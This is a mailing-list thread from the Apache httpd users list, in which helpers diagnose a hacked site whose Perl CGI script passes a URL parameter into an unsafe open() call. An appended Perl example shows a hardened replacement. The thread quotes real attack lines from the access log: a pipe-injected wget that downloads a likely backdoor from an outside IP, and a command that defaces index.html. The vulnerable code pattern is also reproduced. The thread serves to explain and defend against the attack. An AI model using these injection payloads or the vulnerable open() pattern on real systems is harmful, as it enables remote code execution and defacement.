httpd-users mailing list archives
From "Ivan Barrera A." <Br...@Ivn.cl>
Subject Re: [users@httpd] Security Problem
Date Sun, 05 Dec 2004 22:18:29 GMT
As I see it, you take the parameter file from the URL without parsing it 
(as Dick explained in another post too)

  my $data_file =
  "/data/httpd/vhosts/xyz.org/httpdocs/scriptfiles/$FORM{file}";
  if (!open(FILE,"$data_file")) { die "Can't open";}

You are not checking if the file is really valid, and are passing 
additional cmds without even noticing. (The pipe is really dangerous.)

As Dick said... ask your programmer to fix this right up. (And try to 
examine your machine.. it may already be compromised.. if on Red Hat run 
rpm -VVV procps net-tools util-linux rpm , if nothing comes up, you're good.)



Murthy Ambaru wrote:
> Thanks for the explanation. So the file can be downloaded to the /tmp/bind 
> directory on the server executing that script. As I said, I tried typing 
> in the URL used and got nothing. I did not check /tmp/bind though (I 
> did not find that in the interface that I use to manage files on the 
> server). So what would be a secure way of opening the file?
> The script is in PERL. I am adding it below. Can you see anything weird 
> in it?? Thanks...
>  
> #!/usr/local/bin/perl
> print "Content-type: text/html\n\n";
> &parseForm;
> open(HEADER,"printheader.html") ;
> my @HEADER = <HEADER>;
> close(HEADER);
> #print it! Put a # before print if you don't want a header printed...
> print "@HEADER";
> my $data_file = 
> "/data/httpd/vhosts/xyz.org/httpdocs/scriptfiles/$FORM{file}";
> if (!open(FILE,"$data_file")) { die "Can't open";}
> my @FILE = <FILE>;
> close(FILE);
> $print = 1 ;
> foreach $line(@FILE) {
>         if ($line =~ /beginimage/) {
>                 print $line ;
>                 $print = 0;
>                 next ;
>         }
>         if ($line =~ /endimage/) { $print = 1 ; }
>         if ($print eq "1") {
>                 print $line;
>         }
> }
> 
> ########################################################
> sub parseForm {
>     if ($ENV{'REQUEST_METHOD'} eq 'GET') {
>         # Split the name-value pairs
>         @pairs = split(/&/, $ENV{'QUERY_STRING'});
>     }
>     elsif ($ENV{'REQUEST_METHOD'} eq 'POST') {
>         read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'});
>         # Split the name-value pairs
>         @pairs = split(/&/, $buffer);
>     }
>     foreach $pair (@pairs) {
>         ($name, $value) = split(/=/, $pair);
>         # Un-Webify plus signs and %-encoding
>         $value =~ tr/+/ /;
>         $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
>         $FORM{$name} = $value;
>     }
> }
> 
> 
> */"Ivan Barrera A." <Bruce@Ivn.cl>/* wrote:
> 
>     I mean, the cgi script (which I don't know anything about) seems to
>     "open" a file referred to by ?file= ... Probably an insecure way of
>     "opening" the file leads to executing the rest of the statement.
> 
>     Look :
> 
>     ?file=/2004/0722-08.htm|wget%20http://64.58.72.242/bind%20-O/tmp/bind
> 
>     After the correct page, a pipe, and wget http://blabla/bind -O/tmp/bind
>     is appended. So, if the script executes this, the command wget will
>     exec, and download that file into /tmp/bind.
>     After that, using the same technique, you can exec anything you want.
>     So the problem is the way of opening (or doing something else to) the
>     files in the cgi script.
>     Is it a C, Perl, PHP, or any other language script?
> 
>     Murthy Ambaru wrote:
>      > Thanks for the response Ivan. I am sorry I really did not
>      > understand what you mean by "download the file to /tmp/bind". When
>      > the printer friendly link is clicked, this is the URL that will be
>      > accessed:
>      > http://www.xyz.org/cgi-bin/xyz.cgi?file=/2004/0722-08.htm
>      > Of course it depends on the page being clicked. So the file name
>      > will be passed as a parameter to the CGI file. I included the CGI
>      > code in my earlier mail, could you please take a look.
>      > Thanks,
>      > Murthy
>      >
>      > */"Ivan Barrera A." /* wrote:
>      >
>      > The URL you entered downloads the file bind to /tmp/bind . It's
>      > probably an irc bot or a backdoor.
>      > If someone did that, the version of the cgi script is insecure, and
>      > should be revised.
>      >
>      > I'm sorry if I didn't clarify enough, but it would be useful to see
>      > that cgi.
>      >
>      > Murthy Ambaru wrote:
>      > > I have a question regarding security. There is a web site that
>      > > has a printer friendly version of web pages being displayed using
>      > > a CGI script. Apparently when this was in use, the site was hacked
>      > > and some unwanted stuff posted on the site. I had a look at the
>      > > access.log when this occurred and this was what showed up (I just
>      > > replaced the site name with xyz, everything else is the same):
>      > >
>      > > /images/newswireprint.gif HTTP/1.0" 304 -
>      > > "http://www.xyz.org/cgi-bin/xyz.cgi?file=/2004/0722-08.htm|wget%20http://64.58.72.242/bind%20-O/tmp/bind| " "Mozilla/4.0
>      > >
>      > > GET /cgi-bin/xyz.cgi?file=|echo%20innocent%20boys...%20%3E%20/data/httpd/vhosts/xyz.org/httpdocs/index.html|
>      > >
>      > > Can anyone understand how they are able to hack? I tried
>      > > reproducing it by typing in the above URL used by the hackers, but
>      > > could get nothing out of it. The permissions on all the html docs
>      > > folders are set to 755.
>      > >
>      > > Below is the CGI file being used. It basically strips images off.
>      > > Can anyone help with this problem? What should I be looking at to
>      > > plug the security holes.... Thanks a lot
>      > >
>      > > -Murthy
>      > >
>      > >
>      > >
>      > > #!/usr/local/bin/perl
>      > > print "Content-type: text/html\n\n";
>      > > &parseForm;
>      > > open(HEADER,"printheader.html") ;
>      > > my @HEADER = <HEADER>;
>      > > close(HEADER);
>      > > #print it! Put a # before print if you don't want a header printed...
>      > > print "@HEADER";
>      > > my $data_file =
>      > > "/data/httpd/vhosts/xyz.org/httpdocs/scriptfiles/$FORM{file}";
>      > > if (!open(FILE,"$data_file")) { die "Can't open";}
>      > > my @FILE = <FILE>;
>      > > close(FILE);
>      > > $print = 1 ;
>      > > foreach $line(@FILE) {
>      > >         if ($line =~ /beginimage/) {
>      > >                 print $line ;
>      > >                 $print = 0;
>      > >                 next ;
>      > >         }
>      > >         if ($line =~ /endimage/) { $print = 1 ; }
>      > >         if ($print eq "1") {
>      > >                 print $line;
>      > >         }
>      > > }
>      > >
>      > > ########################################################
>      > > sub parseForm {
>      > >     if ($ENV{'REQUEST_METHOD'} eq 'GET') {
>      > >         # Split the name-value pairs
>      > >         @pairs = split(/&/, $ENV{'QUERY_STRING'});
>      > >     }
>      > >     elsif ($ENV{'REQUEST_METHOD'} eq 'POST') {
>      > >         read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'});
>      > >         # Split the name-value pairs
>      > >         @pairs = split(/&/, $buffer);
>      > >     }
>      > >     foreach $pair (@pairs) {
>      > >         ($name, $value) = split(/=/, $pair);
>      > >         # Un-Webify plus signs and %-encoding
>      > >         $value =~ tr/+/ /;
>      > >         $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
>      > >         $FORM{$name} = $value;
>      > >     }
>      > > }
>      > >
>      > >
>      > >
>      > >
>      > >
>      >

---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
   "   from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org
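The fix Ivan and Dick are asking for, written out as an added example (this is not the script from the thread and not code from the httpd project). It puts the original two-argument `open()` next to a hardened replacement; `$DOCROOT` is the path quoted in the thread, while the function names `vulnerable_open` and `safe_open_data_file`, the `/YYYY/name.htm` whitelist pattern and the sample inputs are assumptions made for the example.

```perl
#!/usr/bin/perl
# Added example, not the script from the thread: the original open() from
# xyz.cgi beside a hardened replacement. $DOCROOT matches the path in the
# thread; the function names and the file-name pattern are assumptions.
use strict;
use warnings;
use Cwd qw(realpath);

my $DOCROOT = '/data/httpd/vhosts/xyz.org/httpdocs/scriptfiles';

# The shape of the original code. Two-argument open() reads the *mode* out
# of the data: a trailing '|' turns the string into a shell pipeline, so a
# value like "/2004/0722-08.htm|wget ...|" runs wget instead of reading a file.
sub vulnerable_open {
    my ($name) = @_;
    my $data_file = "$DOCROOT/$name";
    open(FILE, "$data_file") or die "Can't open";   # mode taken from the value itself
    return \*FILE;
}

# Hardened version. Returns ($fh, undef) on success or (undef, $reason).
sub safe_open_data_file {
    my ($name) = @_;
    return (undef, 'missing file parameter') unless defined $name && length $name;

    # 1. Whitelist the exact shape of a printer-friendly link: /YYYY/name.htm
    #    Pipes, spaces, '..' and anything else outside that shape are refused.
    return (undef, 'file name rejected')
        unless $name =~ m{\A/[0-9]{4}/[A-Za-z0-9_-]+\.html?\z};

    # 2. Resolve symlinks and confirm the result still lives under $DOCROOT
    #    (defence in depth against a symlink planted inside the tree).
    my $path = realpath("$DOCROOT$name");
    return (undef, 'no such file') unless defined $path;
    return (undef, 'path outside document root')
        unless index($path, "$DOCROOT/") == 0;

    # 3. Three-argument open with a fixed mode: the data can never choose the mode.
    open(my $fh, '<', $path) or return (undef, "cannot open: $!");
    return ($fh, undef);
}

# Constructed inputs: the legitimate link from the thread, the injected value
# seen in the access.log, and a traversal attempt.
for my $candidate (
    '/2004/0722-08.htm',
    '/2004/0722-08.htm|wget http://64.58.72.242/bind -O/tmp/bind|',
    '/2004/../../../etc/passwd',
) {
    my ($fh, $err) = safe_open_data_file($candidate);
    if ($fh) { print "accepted: $candidate\n"; close $fh }
    else     { print "rejected: $candidate ($err)\n" }
}
```

The whitelist in step 1 is what actually stops the `|wget ...|` and `|echo ... >` requests from the log: both contain characters the pattern never allows, so they are rejected before any filesystem call. Step 3 matters on its own as well, because with `open(my $fh, '<', $path)` a trailing pipe in `$path` is only ever a character in a file name. Running the CGI under `perl -T` (taint mode) is a further safety net: Perl refuses to use untainted request data in a piped open and dies instead of executing the command.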

